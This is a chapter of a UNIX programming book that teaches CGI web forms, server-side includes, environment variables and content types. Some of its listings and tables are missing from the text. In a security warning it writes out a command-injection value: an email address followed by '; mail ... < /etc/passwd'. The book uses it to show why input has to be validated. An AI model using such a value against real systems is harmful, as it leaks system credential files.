UNIX Unleashed, Internet Edition
- 17 -
Programming Web Pages with CGI
by Robin Burk; David B. Horvath, CCP; and Matthew Curtin
So far in this section, we've seen how HTML can be used to specify the content and appearance of screen text and how MIME extends those capabilities to include other media such as graphics, audio, and video.
These elements on a Web page are static. That is, they are output to the user without soliciting or responding to user input (with the possible exception of hotlinks that allow the user to specify which media files to retrieve and when).
Web pages are not limited to static information displays, however. The Web, and indeed the entire Internet, is based on a client-server architecture. Interactions between client machines and Net servers provide much of the Web's flexibility and usefulness, contributing greatly to its rapid growth and the use of the Web for serious business purposes.
In this chapter, we'll look at the client side of one enabling, interactive technology: the Common Gateway Interface. In the following chapters, we'll look at CGI from the server side as well.
What Is the Common Gateway Interface?
The Common Gateway Interface (CGI) defines a platform-independent gateway from HTML scripts to other processes executing on the server. The most common use of CGI on Web pages is to pass data gathered on a screen form to a database application, and to populate a new client screen with appropriate information in response.
CGI mostly executes on the server. In the next few chapters of this section of UNIX Unleashed, we'll examine the details of CGI server-side implementation on UNIX using a variety of script and compiled languages.
However, an important part of this interactive process is the user interface for capturing user input and reporting information back to the user. It's this client side of CGI that we'll examine in this chapter.
What CGI Is Not
SSI (Making dynamic pages without CGI)
SSI (Server-Side Includes) can also be used to generate dynamic pages. This works by having the server parse the HTML of the requested file, looking for, and then executing certain commands embedded inside of HTML comments. The server can even be configured to execute shell commands. Does this scare you? It should. The server reads the HTML, and will execute things contained therein. If shell commands and CGI programs are allowed to be called, this is a very, very dangerous feature, especially if you allow users to publish their own pages (via the public_html directory in their home directories), and allow SSI in those directories.
Does this mean that SSI is always a Bad Thing and should always be avoided? No. The reason I mention SSI in the context of CGI is because it's a good idea to know what your options are, what makes sense in various situations, so you can use the right technology to get the end result that you want. SSI is appropriate for smaller-scale customizations of web pages, such as page headers, page footers, and other things that can be accomplished without an SSI exec. CGI, on the other hand, is a means of making much more sophisticated web-based applications, and handling things like forms input. Generally speaking, if the focus of what you're writing is the HTML, with minor customizations to be done on the server, SSI is a good choice, but if the focus of what you're doing is the dynamic part of your content, perhaps including only small bits of preformatted HTML, CGI is the way to go. That having been said, it's also important to note that CGI is a standard interface, whereas SSI is an invention of the NCSA HTTPd folks, although it's supported widely on other web servers as well now. SSI might present a compatibility problem for you in the future, if you decide to move from one server to another.
More information is provided in the Server-Side Includes section later in this chapter.
Server APIs vs. CGI
Web server software such as Apache and Netscape's offerings support the functionality of writing code that effectively becomes a part of the web server itself. In some cases, this could be useful (such as when it would be beneficial to add some functionality to the core server.) However, use of a server's API will limit your program's portability to one server, OS, and processor architecture. If what you want to do is simply something that should be part of the server's core functionality, and the API gives you the support you need, go for it. But, for the vast majority of server-side processing, CGI is the way to go.
How CGI Works
The client-server interaction in CGI follows a series of standard steps:
On the client side, processing occurs by means of HTML tags, which are interpreted the same way as other tags. On the server side, UNIX environmental variables, command-line arguments, and standard input and output files can be used to communicate between the Web server and the CGI program.
Basic Forms: Tags and Attributes
CGI forms are defined using HTML tags and elements that are dedicated to this purpose.
The FORM tag begins the definition of a form. Any number of forms may be defined on a given HTML page, but forms cannot be nested within one another. When designing Web pages that make use of forms, therefore, think about the logical flow of information and divide complex forms into successive, simpler ones if to do so would help the user keep track of the information and choices he must specify.
Any other legal HTML tags may be embedded within a form definition. Standard HTML is used, for instance, to label the input fields and the form itself.
<FORM ACTION="/cgi-bin/new-query" METHOD=POST>
The INPUT tag is used to define various types of input fields within a form.
Listing 17.1 shows a typical sequence of field definitions and other HTML tags that might be used in a form.
Listing 17.1. Field definitions for a form.
<P> Enter Userid: <INPUT TYPE=text NAME="userid" VALUE="enter id here" SIZE=15 MAXLENGTH=15> <P> and Password: <INPUT TYPE=password NAME="passwd" VALUE="(required)" SIZE=10 MAXLENGTH=10> <P> <INPUT TYPE=checkbox NAME="option1" >Choose option 1 <INPUT TYPE=checkbox NAME="option2" > and option 2 if you like<BR> <P> <P> Select one of the following: <INPUT TYPE=radio VALUE="a" NAME="choice" CHECKED > A <INPUT TYPE=radio VALUE="b" NAME="choice" > B <INPUT TYPE=radio VALUE="c" NAME="choice" > C<BR> <P> <INPUT TYPE=file NAME="send-file" <INPUT TYPE=hidden NAME="user-state" VALUE="been here already">
These field definitions would result in the screen form shown in Figure 17.1.
Several aspects of this form are worth noting at this point. First, notice the use of standard HTML scripting to assign labels to the text and password fields and to display a header for the checkbox and radio button lists.
Second, notice that the browser (not the programmer) assigns the button label for file fields. This reminds us that HTML passes directives to the Web client (browser), but is not a text-formatting language. As with other tags, the screen results displayed by various browsers may differ when processing certain form-related tags.
And finally, note that the hidden field does not appear on the screen.
Although INPUT is the basic field definition tag, client-side CGI offers a number of other interactive capabilities for advanced forms processing.
SELECT and OPTION
The SELECT and OPTION tags provide a way to define a menu of options and capture the user's selection. Although you could hard-code this functionality using checkboxes and radio buttons, the SELECT list provides a more sophisticated menu effect and saves considerable screen space if the selection list is long.
As with the INPUT TYPE=file construct, different browsers may display a SELECT menu in somewhat different ways. All will, however, provide the user with a scrollable list of options from which to choose.
As with other HTML tags, the <SELECT> tag must be paired with a closing </SELECT> tag. In addition to the attributes associated with the SELECT tag itself, the selection list is defined as a series of <OPTION> tags between the <SELECT> and </SELECT> pair.
Listing 17.2 shows the definition of two SELECT lists.
Listing 17.2. Defining SELECT lists.
Please choose an option from the menu: <SELECT NAME="pulldown" SIZE=1> <OPTION>menu choice 1 <OPTION>menu choice 2 <OPTION>menu choice 3 </SELECT> <P> Please choose an option from the scrolling window: <SELECT NAME="scrolling" SIZE=2> <OPTION> window choice 1 <OPTION> window choice 2 <OPTION> window choice 3 </SELECT> <P>
Figure 17.2 shows the resulting form display on the browser.
The TEXTAREA tag is used to create a multiple-line field for free-form text entry. Web page designers often add a textarea field to collect user comments, e-mail to the web author, or similar unstructured information.
As with SELECT, TEXTAREA requires a beginning and ending tag. Between these tags, and in addition to the attributes of the tag, the programmer can enter variable-length default text that will display when the textarea field is drawn on the screen. This text must be deleted by the user before he enters his own input.
Listing 17.3 defines a TEXTAREA field and Figure 17.3 shows the resulting form on the Netscape browser.
Listing 17.3. Defining a free-form TEXTAREA.
<P> Please add any comments or special instructions below: <P> <TEXTAREA NAME="terms" ROWS=6 COLS=50> (comments) </TEXTAREA>
HTML has no provision for defining and calling subroutines. However, a similar functionality can be added to your Web pages by means of a technique called server-side includes.
This technique consists of asking the Web server to execute HTML code that is not included in the current HTML document. This allows reuse of standard lists, forms, or other information across multiple pages without running the risk that updates to the information would occur on some pages but not on others.
Another use for server-side includes is to dynamically create HTML as output from one page, then execute it within the shell of another page. This is a somewhat awkward way to embed dynamic HTML in your Web site, but is occasionally useful.
The syntax for server-side includes is as follows:
While retrieving and transmitting the base HTML document, the server will encounter this line and insert the contents of the specified file into the document at that point.
This technique imposes additional burden on the server system. In most cases, this has a negligible effect; however, on busy systems or in the case of very large include files, the resources necessary to interpret the included HTML can impact server performance.
It is customary (but not necessary) to name documents with server-side includes using the extension .shtml and to configure the Web server software such that all files with this extension are actively parsed by the server. In this case, files with the .html extension would be transmitted to the client without interpretation.
Client-side CGI provides Web page developers with a rich set of form elements. As we'll see in subsequent chapters, server-side CGI provides an equally rich set of gateway and data manipulation capabilities.
Having good tools doesn't automatically guarantee that they will be used well, however. For your Web pages to be effective, you must pay attention to some design and coding considerations.
Fortunately, with most Web clients (browsers) you can view forms as you create them by loading the HTML file into the browser program. This will allow you to check out a page and experiment with design approaches without having a programmed server at hand.
Here are some guidelines and tips for creating attractive, easy-to-use Web pages that include forms:
When you access a Web page (by specifying the URL or clicking on a link in another page), the server uses the provided path and retrieves it for your browser. The same thing occurs when your browser requests an image, sound file, or other file. When the item desired is static or nearly so in nature (like vacation photographs or the list of your top 10 favorite teachers), simple HTML files are an easy way to go.
But if the data is not static, someone must constantly maintain and update the HTML. If the data is frequently changing (like the weather or the stock market), this become difficult. With the time involved to research the data by hand and update the HTML, by the time it is available, it is already out of date. In addition, we all have better things to do than being report formatters.
Instead of loading a static HTML file, a CGI script can be executed. The script does whatever research is necessary (database lookups, calculations, and so on) and then writes out HTML code to dynamically create the page. Instead of the data being hours or even weeks out of date through the manual process, it can be as current as processing and Internet time lags allow (seconds).
How To Execute CGI
When you are coding your HTML, you can reference a CGI script just like a Web page or other resource (image, sound, and so on). The server determines that the resource is a file to execute, not send. Some servers require that these files, no matter what the name, be placed in a special directory to ease in identification.
The URL used to execute a CGI script when the user clicks on a link might look like the following:
<a href="http://www.company.domain/cgi-bin/environ?query=1"> xxx </a>
The URL used to automatically execute a CGI script when the page is loaded (to update and display a counter in the form of a gif image) might look like the following:
You must code your scripts carefully to prevent input data from being executed. You must verify the size, form, and validity of input data. If you expect an email address as input (and use it to send mail to that address), you must make sure that it is just an email address. If the user types in her proper e-mail address, everything works fine. But if she decides to be difficult and enter her e-mail address as
email@example.com ; mail firstname.lastname@example.org < /etc/passwd
then your password file has been sent to email@example.com.
Many security problems arise because the system was designed and implemented by people who didn't understand the environment where the application would be deployed.
Here are some tips that will be useful in developing good CGI programs.
Following these simple guidelines will prevent you from needlessly limiting your audience, hindering your program's usefulness, and compromising the privacy of people using it.
Data Available to the Shell Script
There are a number of environmental variables and other data sources available to the CGI script written in any other language. The variables and values vary by the Web server and the Web browser being used on the client side.
Table 17.1 shows the common environmental variables available to CGI scripts. These are in addition to the normal variables that may be available from the shell itself.
Table 17.1. Environmental variables.
In addition to the query string that is attached to the URL after the ? (returned through the environment variable QUERY_STRING), data is available through STDIN (standard input). The data will be in the form described by CONTENT_TYPE and will be CONTENT_LENGTH bytes long.
There is no guarantee that there will be an end-of-file character at the end of the input. You can read CONTENT_LENGTH number of bytes and then decode the data as necessary. Data submitted from a form is typically in the CONTENT_TYPE of 'application/x-www-form-urlencoded', which converts any non-text characters to their hexadecimal equivalents (a space becomes %20).
Output from CGI scripts is written to STDOUT (standard output). It should contain a HTTP header to tell the browser what kind of data it is getting. Anything after that is interpreted as that type of data by the browser. If the browser is told that it is getting HTML, it will interpret it as HTML; if it is told that a gif file is coming from the server, it will attempt to interpret what follows as a gif image.
At the beginning of every CGI script, you need to tell the client browser what it is you are sending. This is done through the first two lines:
Content-type: text/html _
The first line is the type of data, the second line is always blank. The server will add in additional information as needed.
The most basic type is text/html, which is used, as the name implies, to denote that it contains HTML code in a text format (no binary data). These are referred to as MIME (Multipurpose Internet Mail Extension) types (MIME is explained in Chapter 16 of Volume 2) and are used to specify the type of data and encoding method used to transmit that data.
Table 17.2 shows the common content types. The Web browser might not be able to handle a specific type directly. In that case, it will use what are known as "helpers" or "helper applications," which are external programs that are able to handle the content.
Table 17.2. Common content types.
CONTENT_TYPE tells your script what it received from the browser; HTTP_ACCEPT tells it what the browser can display.
It is up to you as a programmer to ensure that your output conforms to the specifications for a particular type. If it does not, the correct results will not be displayed and the users will be annoyed.
The Minimal Response
At a minimum, your CGI script needs to send the content type back to the Web browser and should send something meaningful back (after all, that is why a CGI script is executed--to do something).
As previously mentioned, the URL used for CGI scripts might be different depending on the server software used. Some look for the files in one location while others require different locations.
You should talk to your local administrator or ISP for more information on exactly how to code your URLs and where to place your files when using CGI scripts. The ISP I use requires CGI scripts go in the subdirectory cgi-bin under public_html. When referencing the scripts, only the cgi-bin directory is mentioned.
The technique of creating HTML code in a CGI script is referred to as "Dynamic HTML" because it can change depending on the results of the script being executed. HTML in a regular file (the "normal" way of doing things) does not change unless you replace it, so it is fairly static. Each user could see something different out of a CGI script, so it is very dynamic.
One of the more common uses for CGI scripts is processing the data received from HTML forms. The form method is coded as POST and the action is the URL for your script. The user enters data through his Web browser into the form described in HTML, and when he clicks the submit button, your script is executed.
There are a number of ways to deal with the data received from the form. You can save it to a file, you can mail it to someone or a mail-enabled application, or you can perform more complex processing. You might enter someone in a database, send her a confirmation e-mail, and then add her to an e-mail mailing list. Or you could just save the data (signing a Web page guest book or filling out a comments form are common examples).
Sending the data as e-mail to a user is the simplest method because you do not have to deal with file or record locking issues. This is especially important if your ISP or system administrator will not let you execute binaries on the system. If you could execute binaries, then you could use a program to access a database.
Some Internet Service Providers will not allow you to execute my CGI scripts directly. Mine enforces this restriction. I have to execute a program that then executes my script. This is known as wrappering or wrapping--my code is run by other code.
There are a number of purposes for this. The wrapper can control the amount of CPU, I/O, and other resources my script is able to use (preventing runaway or system-hogging scripts), can provide additional security, and do some of the setup for you by resolving environment variables. Another important feature is the ability to run the wrapper in debugging mode. In that mode it shows all the environment variables that were passed to my script so that debugging is much easier.
The only down side that I have seen so far with the wrapper is that the URL is a little confusing until I got used to it. Instead of coding:
<a href="~joeuser/cgi-bin/test.ksh">Link Text</a>
<a href="/cgi-bin/cgiwrap/joeuser/test.ksh">Link Text</a>
Cookies are another way to maintain state information. A cookie is simply a bit of data that contains a number of name/value pairs that is passed between the client and the server in the HTTP header, rather than in the query string. In addition to name/value pairs, a number of other optional attributes exist.
Beware that cookies are still at a preliminary state in their specification. You might find that things suddenly don't behave quite the way you'd expect when someone is using a different version of a cookie-supporting browser. The official specification is kept at
Reference to CGI Resources
There are many resources available on the Internet and in printed books. The following are some starting points:
CGI Scripting Overview
Yahoo's CGI links
Using HTML 3.2, Java 1.1, and CGI, Eric Ladd and Jim O'Donnell, Que Corporation, 1996, ISBN 0-7897-0932-5.
The Common Gateway Interface (CGI) provides a powerful and flexible way to extend Web page functionality.
Client-side CGI is programmed using HTML tags, resulting in forms that capture user input and transmit it to server-side applications. The server side of CGI passes this information to application programs that return updated Web pages and other information to the client system.
There are three general categories of tools for the development of CGI:
Each of these tools have their own advantages and disadvantages. Each does some things better and some things worse than the other tools. The next three chapters will provide information on developing CGI using tools in each of these categories.